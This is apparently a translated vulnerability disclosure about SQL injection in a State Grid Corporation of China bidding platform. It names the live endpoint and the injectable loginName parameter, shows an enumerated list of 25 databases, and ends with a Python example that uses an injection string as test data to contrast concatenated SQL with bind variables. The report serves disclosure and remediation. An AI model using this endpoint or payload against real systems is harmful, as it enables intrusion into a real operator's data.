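2013-07-04: Details reported to the vendor; awaiting vendor handling
2013-07-04: Vendor confirmed; details disclosed to the vendor only
2013-07-14: Details disclosed to core white hats and experts in related fields
2013-07-24: Details disclosed to regular white hats
2013-08-03: Details disclosed to trainee white hats
2013-08-18: Details disclosed to the public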
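SQL injection vulnerability in an important platform of State Grid Corporation of China
The affected system is the State Grid Corporation of China e-commerce platform, which handles important business such as online electronic bidding. The issue is a SQL injection in a POST request.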
https://ecp.sgcc.com.cn/BidUpgrade/SgccRecyclersModify?next=2
POST DATA: password=12345678&loginName=12345678
available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] B
[*] BIDPRO2
[*] BUYER
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOLDENGATE
[*] MDSY
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PATROL
[*] SOURCING
[*] STAR1
[*] STAR2
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
database management system users password hashes:
Filter the loginName parameter.
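The fix above, as an added example that is not part of the original report: it goes one step beyond filtering and shows the flawed pattern of concatenating loginName into the SQL text beside a lookup that validates the value and passes it as a bind variable. The table, sample rows, allow-list pattern and function names are assumptions, and sqlite3 stands in for the Oracle backend so the block runs offline.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumed allow-list for loginName; adjust to the real account-name rules.
LOGIN_NAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def make_db():
    """Constructed sample data; sqlite3 stands in for the Oracle backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE bidders (login_name TEXT PRIMARY KEY, company TEXT)")
    db.executemany("INSERT INTO bidders VALUES (?, ?)",
                   [("supplier01", "Example Co"), ("supplier02", "Sample Ltd")])
    return db


def login_name_from_body(body):
    """Extract loginName from a form-encoded POST body; reject repeats."""
    values = parse_qs(body, keep_blank_values=True).get("loginName", [])
    if len(values) != 1:
        raise ValueError("loginName must appear exactly once")
    return values[0]


def lookup_concatenated(db, body):
    """Flawed pattern: the request value becomes part of the SQL text."""
    name = login_name_from_body(body)
    sql = "SELECT login_name FROM bidders WHERE login_name = '" + name + "'"
    return sorted(row[0] for row in db.execute(sql))


def lookup_bound(db, body, validate=True):
    """Hardened: optional allow-list check, then a bind variable carries the value."""
    name = login_name_from_body(body)
    if validate and not LOGIN_NAME_RE.fullmatch(name):
        raise ValueError("loginName has characters outside the allow-list")
    sql = "SELECT login_name FROM bidders WHERE login_name = ?"
    return sorted(row[0] for row in db.execute(sql, (name,)))


if __name__ == "__main__":
    db = make_db()
    # Constructed bodies in the shape of the report's POST data.
    normal = "password=12345678&loginName=supplier01"
    quoted = "password=12345678&loginName=x%27+OR+%271%27%3D%271"
    print(lookup_concatenated(db, normal))             # one row
    print(lookup_concatenated(db, quoted))             # every row: input ran as SQL
    print(lookup_bound(db, quoted, validate=False))    # no rows: input stayed data
```

The bind variable is what keeps the request value out of the SQL text; the allow-list check is defence in depth that rejects malformed names before the query runs.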
Severity: High
Vulnerability Rank: 15
Confirmed: 2013-07-04 16:23
Thanks, we will fix this as soon as possible.
None yet